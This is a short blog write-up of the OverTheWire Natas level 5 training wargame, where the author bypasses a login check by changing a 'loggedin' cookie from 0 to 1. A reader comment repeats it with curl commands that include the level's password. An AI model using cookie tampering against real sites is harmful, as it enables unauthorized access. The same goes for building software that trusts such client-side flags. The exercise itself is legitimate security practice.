Sunday, November 4, 2012

Home cookies hacking html natas overthewire wargames OverTheWire Natas Level 5

OverTheWire Natas Level 5

, , , , ,
Now that we're about 1/3 through to the end of the OverTheWire Natas wargame, I'm hoping that they start to get a little more tricky.  Level 5 unfortunately is still pretty easy.

It starts by simply telling you that you're not logged in.
Logins often hand out cookies, so I viewed my cookies for the site.  I then used the wonderful Chrome extension, Edit This Cookie, to modify the cookie that I saw it assign, from a "0" to a "1", signifying that I was logged on.
After saving the changes to the cookie, I refreshed the page, and it showed me the next level's password.


Labels:
Author Image

Author: Unknown
Waythemes is a blogger resources site is a provider of high quality blogger template with premium looking layout and robust design

Follow The Author
Posted by at
Labels: , , , , ,

1 comment:

  1. PassengerNovember 6, 2012 at 7:37 AM

    Without installing any plugins

    1 - Get cookies storing them in a file myCookies
    curl -D myCookies.txt http://natas5.natas.labs.overthewire.org/index.php -u natas5:V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z

    2 - Find what I need
    Set-Cookie: loggedin=0

    3 - Setting the value to 1
    curl http://natas5.natas.labs.overthewire.org/index.php -u natas5:V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z --cookie "loggedin=1"

    ReplyDelete

Popular

  • Using .net to bypass AV
    Using .net to bypass AV
    I've read a ton of articles on bypassing Antivirus software when trying to run shellcode on machines. There's just a ton available....
  • Buffer Overflow in HexChat 2.9.4
    Buffer Overflow in HexChat 2.9.4
    A buddy of mine, Mulitia , and I were talking about 0-days, and he mentioned finding one in Hex-Chat, a popular IRC client. It was super low...
  • Sysax 5.64 HTTP Remote Buffer Overflow
    Sysax 5.64 HTTP Remote Buffer Overflow
    I have discovered a bug in the Sysax Multi-Server application .  More specifically, it's in the HTTP File Server service, which is not e...
  • Exploit Exercises - Nebula 01
    Continuing from my previous post, I started tinkering with the next Nebula wargame: Nebula 01 .  This one gives you some C code, which has ...
  • PWB Conclusions and the Future
    PWB Conclusions and the Future
    The results As I posted previously , I was taking the PWB course from Offensive Security . I am happy to report that I passed with ...
  • Exploit Exercises - Nebula 02
    In this challenge, we're again provided with the source code to the vulnerable program. Only this time, they're not loading the &q...
  • Sysax Multi Server 6.10 SSH DoS
    Sysax Multi Server 6.10 SSH DoS
    I was recently fuzzing a bunch of SSH servers, hoping to find some remote code execution in a non-mainstream server. I ended up finding no c...
  • OverTheWire Natas Level 5
    OverTheWire Natas Level 5
    Now that we're about 1/3 through to the end of the OverTheWire Natas wargame, I'm hoping that they start to get a little more trick...
  • Origin of the name "Pentium"
    I was reading about x86 assembly, and stumbled upon the origin of the name "Pentium". I never knew it was due to course disallowi...
  • Multiple Hover.com Security Issues
    Multiple Hover.com Security Issues
    I'm a customer of Hover  for my domain name needs. However, that will be changing because I don't believe that they take issues seri...

Recent

Comments